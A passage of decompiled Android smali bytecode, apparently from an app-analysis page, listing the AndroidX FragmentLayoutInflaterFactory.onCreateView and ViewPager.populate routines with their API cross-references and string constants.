                        115invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        117const-string v3, "onCreateView: id=0x"
                        119invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        121invoke-static {v2}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        122move-result-object v3
                        124invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        126const-string v3, " fname="
                        128invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        130invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        132const-string v3, " existing="
                        134invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        136invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        138invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        139move-result-object v1
                        141const-string v3, "FragmentManager"
                        143invoke-static {v3, v1}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        144cond_ca: const/4 v1, 0x1
                        145if-nez v0, :cond_10c
                        147iget-object v0, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        149invoke-virtual {v0}, Landroidx/fragment/app/FragmentManager;->getFragmentFactory()Landroidx/fragment/app/FragmentFactory;
                        150move-result-object v0
                        152invoke-virtual {p3}, Landroid/content/Context;->getClassLoader()Ljava/lang/ClassLoader;
                        153move-result-object p3
                        155invoke-virtual {v0, p3, p2}, Landroidx/fragment/app/FragmentFactory;->instantiate(Ljava/lang/ClassLoader;Ljava/lang/String;)Landroidx/fragment/app/Fragment;
                        156move-result-object v0
                        157iput-boolean v1, v0, Landroidx/fragment/app/Fragment;->mFromLayout:Z
                        158if-eqz v2, :cond_e1
                        159move p3, v2
                        160goto/16 :goto_e2
                        161cond_e1: move p3, p1
                        162goto_e2: iput p3, v0, Landroidx/fragment/app/Fragment;->mFragmentId:I
                        163iput p1, v0, Landroidx/fragment/app/Fragment;->mContainerId:I
                        164iput-object v4, v0, Landroidx/fragment/app/Fragment;->mTag:Ljava/lang/String;
                        165iput-boolean v1, v0, Landroidx/fragment/app/Fragment;->mInLayout:Z
                        167iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        168iput-object p1, v0, Landroidx/fragment/app/Fragment;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        170iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        172iget-object p1, p1, Landroidx/fragment/app/FragmentManager;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        173iput-object p1, v0, Landroidx/fragment/app/Fragment;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        175iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        177iget-object p1, p1, Landroidx/fragment/app/FragmentManager;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        179invoke-virtual {p1}, Landroidx/fragment/app/FragmentHostCallback;->getContext()Landroid/content/Context;
                        180move-result-object p1
                        182iget-object p3, v0, Landroidx/fragment/app/Fragment;->mSavedFragmentState:Landroid/os/Bundle;
                        184invoke-virtual {v0, p1, p4, p3}, Landroidx/fragment/app/Fragment;->onInflate(Landroid/content/Context;Landroid/util/AttributeSet;Landroid/os/Bundle;)V
                        186iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        188invoke-virtual {p1, v0}, Landroidx/fragment/app/FragmentManager;->addFragment(Landroidx/fragment/app/Fragment;)V
                        190iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        192invoke-virtual {p1, v0}, Landroidx/fragment/app/FragmentManager;->moveToState(Landroidx/fragment/app/Fragment;)V
                        193goto/16 :goto_125
                        194cond_10c: iget-boolean p3, v0, Landroidx/fragment/app/Fragment;->mInLayout:Z
                        195if-nez p3, :cond_171
                        196iput-boolean v1, v0, Landroidx/fragment/app/Fragment;->mInLayout:Z
                        198iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        200iget-object p1, p1, Landroidx/fragment/app/FragmentManager;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        201iput-object p1, v0, Landroidx/fragment/app/Fragment;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        203iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        205iget-object p1, p1, Landroidx/fragment/app/FragmentManager;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        207invoke-virtual {p1}, Landroidx/fragment/app/FragmentHostCallback;->getContext()Landroid/content/Context;
                        208move-result-object p1
                        210iget-object p3, v0, Landroidx/fragment/app/Fragment;->mSavedFragmentState:Landroid/os/Bundle;
                        212invoke-virtual {v0, p1, p4, p3}, Landroidx/fragment/app/Fragment;->onInflate(Landroid/content/Context;Landroid/util/AttributeSet;Landroid/os/Bundle;)V
                        213goto_125:
                        214iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        215iget p1, p1, Landroidx/fragment/app/FragmentManager;->mCurState:I
                        216if-ge p1, v1, :cond_135
                        217iget-boolean p1, v0, Landroidx/fragment/app/Fragment;->mFromLayout:Z
                        218if-eqz p1, :cond_135
                        220iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        222invoke-virtual {p1, v0, v1}, Landroidx/fragment/app/FragmentManager;->moveToState(Landroidx/fragment/app/Fragment;I)V
                        223goto/16 :goto_13a
                        224cond_135:
                        225iget-object p1, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        227invoke-virtual {p1, v0}, Landroidx/fragment/app/FragmentManager;->moveToState(Landroidx/fragment/app/Fragment;)V
                        228goto_13a:
                        229iget-object p1, v0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        230if-eqz p1, :cond_155
                        231if-eqz v2, :cond_145
                        233iget-object p1, v0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        235invoke-virtual {p1, v2}, Landroid/view/View;->setId(I)V
                        236cond_145:
                        237iget-object p1, v0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        239invoke-virtual {p1}, Landroid/view/View;->getTag()Ljava/lang/Object;
                        240move-result-object p1
                        241if-nez p1, :cond_152
                        243iget-object p1, v0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        245invoke-virtual {p1, v4}, Landroid/view/View;->setTag(Ljava/lang/Object;)V
                        246cond_152:
                        247iget-object p1, v0, Landroidx/fragment/app/Fragment;->mView:Landroid/view/View;
                        248return-object p1
                        249cond_155: new-instance p1, Ljava/lang/IllegalStateException;
                        250new-instance p3, Ljava/lang/StringBuilder;
                        252invoke-direct {p3}, Ljava/lang/StringBuilder;-><init>()V
                        254const-string p4, "Fragment "
                        256invoke-virtual {p3, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        258invoke-virtual {p3, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        260const-string p2, " did not create a view."
                        262invoke-virtual {p3, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        264invoke-virtual {p3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        265move-result-object p2
                        267invoke-direct {p1, p2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        268throw p1
                        269cond_171: new-instance p3, Ljava/lang/IllegalArgumentException;
                        270new-instance v0, Ljava/lang/StringBuilder;
                        272invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        274invoke-interface {p4}, Landroid/util/AttributeSet;->getPositionDescription()Ljava/lang/String;
                        275move-result-object p4
                        277invoke-virtual {v0, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        279const-string p4, ": Duplicate id 0x"
                        281invoke-virtual {v0, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        283invoke-static {v2}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        284move-result-object p4
                        286invoke-virtual {v0, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        288const-string p4, ", tag "
                        290invoke-virtual {v0, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        292invoke-virtual {v0, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        294const-string p4, ", or parent id 0x"
                        296invoke-virtual {v0, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        298invoke-static {p1}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        299move-result-object p1
                        301invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        303const-string p1, " with another fragment for "
                        305invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        307invoke-virtual {v0, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        309invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        310move-result-object p1
                        312invoke-direct {p3, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        313throw p3
                        314cond_1af: return-object v0
                        Cross References
                        APIs
                        • androidx.viewpager.widget.ViewPager.infoForPosition
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • androidx.viewpager.widget.ViewPager.sortChildDrawingOrder
                        • androidx.viewpager.widget.ViewPager.sortChildDrawingOrder
                        • androidx.viewpager.widget.ViewPager.getWindowToken
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • java.lang.Math.max
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • java.lang.Math.min
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.size
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.addNewItem
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.getClientWidth
                        • androidx.viewpager.widget.ViewPager.getPaddingLeft
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.remove
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.addNewItem
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.size
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.getPaddingRight
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.remove
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.size
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.size
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.addNewItem
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.size
                        • androidx.viewpager.widget.ViewPager.mItems:Ljava/util/ArrayList
                        • java.util.ArrayList.get
                        • androidx.viewpager.widget.ViewPager.calculatePageOffsets
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • androidx.viewpager.widget.ViewPager.getChildCount
                        • androidx.viewpager.widget.ViewPager.getChildAt
                        • android.view.View.getLayoutParams
                        • androidx.viewpager.widget.ViewPager.infoForChild
                        • androidx.viewpager.widget.ViewPager.sortChildDrawingOrder
                        • androidx.viewpager.widget.ViewPager.hasFocus
                        • androidx.viewpager.widget.ViewPager.findFocus
                        • androidx.viewpager.widget.ViewPager.infoForAnyChild
                        • androidx.viewpager.widget.ViewPager.getChildCount
                        • androidx.viewpager.widget.ViewPager.getChildAt
                        • androidx.viewpager.widget.ViewPager.infoForChild
                        • android.view.View.requestFocus
                        • androidx.viewpager.widget.ViewPager.getResources
                        • androidx.viewpager.widget.ViewPager.getId
                        • android.content.res.Resources.getResourceName
                        • androidx.viewpager.widget.ViewPager.getId
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.Object.getClass
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • androidx.viewpager.widget.ViewPager.mAdapter:Landroidx/viewpager/widget/PagerAdapter
                        • java.lang.Object.getClass
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • The application\'s PagerAdapter changed the adapter\'s contents without calling PagerAdapter#notifyDataSetChanged! Expected adapter item count:
                        • , found:
                        • Pager id:
                        • Pager class:
                        • Problematic adapter:
                        Position Instruction Meta Information
                        0move-object/from16 v0, p0
                        1move/from16 v1, p1
                        2iget v2, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        3if-eq v2, v1, :cond_f
                        5invoke-virtual {v0, v2}, Landroidx/viewpager/widget/ViewPager;->infoForPosition(I)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        6move-result-object v2
                        7iput v1, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        8goto/16 :goto_10
                        9cond_f: const/4 v2, 0x0
                        10goto_10:
                        11iget-object v1, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        12if-nez v1, :cond_18
                        14invoke-direct/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->sortChildDrawingOrder()V
                        15return-void
                        16cond_18: iget-boolean v1, v0, Landroidx/viewpager/widget/ViewPager;->mPopulatePending:Z
                        17if-eqz v1, :cond_20
                        19invoke-direct/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->sortChildDrawingOrder()V
                        20return-void
                        21cond_20:
                        22invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getWindowToken()Landroid/os/IBinder;
                        23move-result-object v1
                        24if-nez v1, :cond_27
                        25return-void
                        26cond_27:
                        27iget-object v1, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        29invoke-virtual {v1, v0}, Landroidx/viewpager/widget/PagerAdapter;->startUpdate(Landroid/view/ViewGroup;)V
                        30iget v1, v0, Landroidx/viewpager/widget/ViewPager;->mOffscreenPageLimit:I
                        31iget v4, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        32sub-int/2addr v4, v1
                        33const/4 v5, 0x0
                        35invoke-static {v5, v4}, Ljava/lang/Math;->max(II)I
                        36move-result v4
                        38iget-object v6, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        40invoke-virtual {v6}, Landroidx/viewpager/widget/PagerAdapter;->getCount()I
                        41move-result v6
                        42add-int/lit8 v7, v6, -0x1
                        43iget v8, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        44add-int/2addr v8, v1
                        46invoke-static {v7, v8}, Ljava/lang/Math;->min(II)I
                        47move-result v1
                        48iget v7, v0, Landroidx/viewpager/widget/ViewPager;->mExpectedAdapterCount:I
                        49if-ne v6, v7, :cond_212
                        50const/4 v7, 0x0
                        51goto_4a:
                        52iget-object v8, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        54invoke-virtual {v8}, Ljava/util/ArrayList;->size()I
                        55move-result v8
                        56if-ge v7, v8, :cond_6a
                        58iget-object v8, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        60invoke-virtual {v8, v7}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        61move-result-object v8
                        62check-cast v8, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        63iget v9, v8, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        64iget v10, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        65if-lt v9, v10, :cond_67
                        66iget v9, v8, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        67iget v10, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        68if-ne v9, v10, :cond_6a
                        69goto/16 :goto_6b
                        70cond_67: add-int/lit8 v7, v7, 0x1
                        71goto/16 :goto_4a
                        72cond_6a: const/4 v8, 0x0
                        73goto_6b: if-nez v8, :cond_75
                        74if-lez v6, :cond_75
                        75iget v8, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        77invoke-virtual {v0, v8, v7}, Landroidx/viewpager/widget/ViewPager;->addNewItem(II)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        78move-result-object v8
                        79cond_75: const/4 v9, 0x0
                        80if-eqz v8, :cond_19f
                        81add-int/lit8 v10, v7, -0x1
                        82if-ltz v10, :cond_85
                        84iget-object v11, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        86invoke-virtual {v11, v10}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        87move-result-object v11
                        88check-cast v11, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        89goto/16 :goto_86
                        90cond_85: const/4 v11, 0x0
                        91goto_86:
                        92invoke-direct/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getClientWidth()I
                        93move-result v12
                        94const/high16 v13, 0x40000000 # 2.0f
                        95if-gtz v12, :cond_90
                        96const/4 v14, 0x0
                        97goto/16 :goto_9c
                        98cond_90: iget v14, v8, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        99sub-float v14, v13, v14
                        101invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getPaddingLeft()I
                        102move-result v15
                        103int-to-float v15, v15
                        104int-to-float v3, v12
                        105div-float/2addr v15, v3
                        106add-float/2addr v14, v15
                        107goto_9c: iget v3, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        108add-int/lit8 v3, v3, -0x1
                        109const/4 v15, 0x0
                        110goto_a1: if-ltz v3, :cond_101
                        111cmpl-float v16, v15, v14
                        112if-ltz v16, :cond_cf
                        113if-ge v3, v4, :cond_cf
                        114if-nez v11, :cond_ac
                        115goto/16 :goto_101
                        116cond_ac: iget v5, v11, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        117if-ne v3, v5, :cond_fd
                        118iget-boolean v5, v11, Landroidx/viewpager/widget/ViewPager$ItemInfo;->scrolling:Z
                        119if-nez v5, :cond_fd
                        121iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        123invoke-virtual {v5, v10}, Ljava/util/ArrayList;->remove(I)Ljava/lang/Object;
                        125iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        127iget-object v11, v11, Landroidx/viewpager/widget/ViewPager$ItemInfo;->object:Ljava/lang/Object;
                        129invoke-virtual {v5, v0, v3, v11}, Landroidx/viewpager/widget/PagerAdapter;->destroyItem(Landroid/view/ViewGroup;ILjava/lang/Object;)V
                        130add-int/lit8 v10, v10, -0x1
                        131add-int/lit8 v7, v7, -0x1
                        132if-ltz v10, :cond_fb
                        134iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        136invoke-virtual {v5, v10}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        137move-result-object v5
                        138check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        139goto/16 :goto_fc
                        140cond_cf: if-eqz v11, :cond_e5
                        141iget v5, v11, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        142if-ne v3, v5, :cond_e5
                        143iget v5, v11, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        144add-float/2addr v15, v5
                        145add-int/lit8 v10, v10, -0x1
                        146if-ltz v10, :cond_fb
                        148iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        150invoke-virtual {v5, v10}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        151move-result-object v5
                        152check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        153goto/16 :goto_fc
                        154cond_e5: add-int/lit8 v5, v10, 0x1
                        156invoke-virtual {v0, v3, v5}, Landroidx/viewpager/widget/ViewPager;->addNewItem(II)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        157move-result-object v5
                        158iget v5, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        159add-float/2addr v15, v5
                        160add-int/lit8 v7, v7, 0x1
                        161if-ltz v10, :cond_fb
                        163iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        165invoke-virtual {v5, v10}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        166move-result-object v5
                        167check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        168goto/16 :goto_fc
                        169cond_fb: const/4 v5, 0x0
                        170goto_fc: move-object v11, v5
                        171cond_fd: add-int/lit8 v3, v3, -0x1
                        172const/4 v5, 0x0
                        173goto/16 :goto_a1
                        174goto_101: iget v3, v8, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        175add-int/lit8 v4, v7, 0x1
                        176cmpg-float v5, v3, v13
                        177if-gez v5, :cond_193
                        179iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        181invoke-virtual {v5}, Ljava/util/ArrayList;->size()I
                        182move-result v5
                        183if-ge v4, v5, :cond_11a
                        185iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        187invoke-virtual {v5, v4}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        188move-result-object v5
                        189check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        190goto/16 :goto_11b
                        191cond_11a: const/4 v5, 0x0
                        192goto_11b: if-gtz v12, :cond_11f
                        193const/4 v10, 0x0
                        194goto/16 :goto_127
                        195cond_11f:
                        196invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getPaddingRight()I
                        197move-result v10
                        198int-to-float v10, v10
                        199int-to-float v11, v12
                        200div-float/2addr v10, v11
                        201add-float/2addr v10, v13
                        202goto_127: iget v11, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        203goto_129: add-int/lit8 v11, v11, 0x1
                        204if-ge v11, v6, :cond_193
                        205cmpl-float v12, v3, v10
                        206if-ltz v12, :cond_15d
                        207if-le v11, v1, :cond_15d
                        208if-nez v5, :cond_136
                        209goto/16 :goto_193
                        210cond_136: iget v12, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        211if-ne v11, v12, :cond_192
                        212iget-boolean v12, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->scrolling:Z
                        213if-nez v12, :cond_192
                        215iget-object v12, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        217invoke-virtual {v12, v4}, Ljava/util/ArrayList;->remove(I)Ljava/lang/Object;
                        219iget-object v12, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        221iget-object v5, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->object:Ljava/lang/Object;
                        223invoke-virtual {v12, v0, v11, v5}, Landroidx/viewpager/widget/PagerAdapter;->destroyItem(Landroid/view/ViewGroup;ILjava/lang/Object;)V
                        225iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        227invoke-virtual {v5}, Ljava/util/ArrayList;->size()I
                        228move-result v5
                        229if-ge v4, v5, :cond_15b
                        231iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        233invoke-virtual {v5, v4}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        234move-result-object v5
                        235check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        236goto/16 :goto_192
                        237cond_15b: const/4 v5, 0x0
                        238goto/16 :goto_192
                        239cond_15d: if-eqz v5, :cond_179
                        240iget v12, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        241if-ne v11, v12, :cond_179
                        242iget v5, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        243add-float/2addr v3, v5
                        244add-int/lit8 v4, v4, 0x1
                        246iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        248invoke-virtual {v5}, Ljava/util/ArrayList;->size()I
                        249move-result v5
                        250if-ge v4, v5, :cond_15b
                        252iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        254invoke-virtual {v5, v4}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        255move-result-object v5
                        256check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        257goto/16 :goto_192
                        258cond_179:
                        259invoke-virtual {v0, v11, v4}, Landroidx/viewpager/widget/ViewPager;->addNewItem(II)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        260move-result-object v5
                        261add-int/lit8 v4, v4, 0x1
                        262iget v5, v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        263add-float/2addr v3, v5
                        265iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        267invoke-virtual {v5}, Ljava/util/ArrayList;->size()I
                        268move-result v5
                        269if-ge v4, v5, :cond_15b
                        271iget-object v5, v0, Landroidx/viewpager/widget/ViewPager;->mItems:Ljava/util/ArrayList;
                        273invoke-virtual {v5, v4}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        274move-result-object v5
                        275check-cast v5, Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        276cond_192: goto/16 :goto_129
                        277cond_193:
                        278invoke-direct {v0, v8, v7, v2}, Landroidx/viewpager/widget/ViewPager;->calculatePageOffsets(Landroidx/viewpager/widget/ViewPager$ItemInfo;ILandroidx/viewpager/widget/ViewPager$ItemInfo;)V
                        280iget-object v1, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        281iget v2, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        283iget-object v3, v8, Landroidx/viewpager/widget/ViewPager$ItemInfo;->object:Ljava/lang/Object;
                        285invoke-virtual {v1, v0, v2, v3}, Landroidx/viewpager/widget/PagerAdapter;->setPrimaryItem(Landroid/view/ViewGroup;ILjava/lang/Object;)V
                        286cond_19f:
                        287iget-object v1, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        289invoke-virtual {v1, v0}, Landroidx/viewpager/widget/PagerAdapter;->finishUpdate(Landroid/view/ViewGroup;)V
                        291invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getChildCount()I
                        292move-result v1
                        293const/4 v2, 0x0
                        294goto_1a9: if-ge v2, v1, :cond_1d2
                        296invoke-virtual {v0, v2}, Landroidx/viewpager/widget/ViewPager;->getChildAt(I)Landroid/view/View;
                        297move-result-object v3
